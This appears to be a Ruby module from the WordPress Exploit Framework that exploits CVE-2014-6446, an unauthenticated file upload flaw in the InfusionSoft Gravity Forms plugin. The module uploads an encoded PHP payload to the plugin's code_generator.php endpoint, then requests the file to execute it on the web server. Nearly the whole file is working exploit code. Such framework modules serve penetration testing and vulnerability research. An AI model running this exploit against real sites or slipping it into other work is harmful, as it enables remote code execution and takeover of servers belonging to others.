# frozen_string_literal: true

class Wpxf::Exploit::InfusionsoftShellUpload < Wpxf::Module
  include Wpxf

  def initialize
    super

    update_info(
      name: 'InfusionSoft Shell Upload',
      desc: 'This module exploits a file upload vulnerability in versions '\
            '1.5.3 to 1.5.10 of the InfusionSoft Gravity Forms plugin which '\
            'allows unauthenticated users to upload and execute PHP scripts '\
            'in the context of the web server.',
      author: [
        'g0blin',    # Vulnerability discovery
        'rastating'  # WPXF module
      ],
      references: [
        ['CVE', '2014-6446'],
        ['URL', 'http://research.g0blin.co.uk/cve-2014-6446/'],
        ['WPVDB', '7634']
      ],
      date: 'Sep 25 2014'
    )
  end

  def check
    check_plugin_version_from_readme('infusionsoft', '1.5.11', '1.5.3')
  end

  def plugin_url
    normalize_uri(wordpress_url_plugins, 'infusionsoft')
  end

  def uploader_url
    normalize_uri(plugin_url, 'Infusionsoft', 'utilities', 'code_generator.php')
  end

  def run
    return false unless super

    emit_info 'Preparing payload...'
    payload_name = "#{Utility::Text.rand_alpha(rand(5..10))}.php"
    body = {
      'fileNamePattern' => payload_name,
      'fileTemplate' => payload.encoded
    }

    emit_info 'Uploading payload...'
    res = execute_post_request(url: uploader_url, body: body)

    if res.nil? || res.timed_out?
      emit_error 'No response from the target'
      return false
    end

    if res.code != 200 || res.body !~ /Creating File/i
      emit_info "Response code: #{res.code}", true
      emit_info "Response body: #{res.body}", true
      emit_error 'Failed to upload payload'
      return false
    end

    payload_url = normalize_uri(plugin_url, 'Infusionsoft', 'utilities', payload_name)
    emit_success "Uploaded the payload to #{payload_url}", true

    emit_info 'Executing the payload...'
    res = execute_get_request(url: payload_url)
    if res && res.code == 200 && !res.body.strip.empty?
      emit_success "Result: #{res.body}"
    end

    return true
  end
end
